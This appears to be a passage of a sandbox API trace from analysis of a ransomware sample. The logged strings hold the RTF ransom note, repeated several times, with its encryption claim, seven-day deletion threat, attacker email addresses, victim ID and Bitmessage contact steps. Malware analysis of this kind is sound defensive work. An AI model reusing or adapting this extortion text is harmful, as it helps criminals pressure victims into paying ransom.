reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2373dc8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 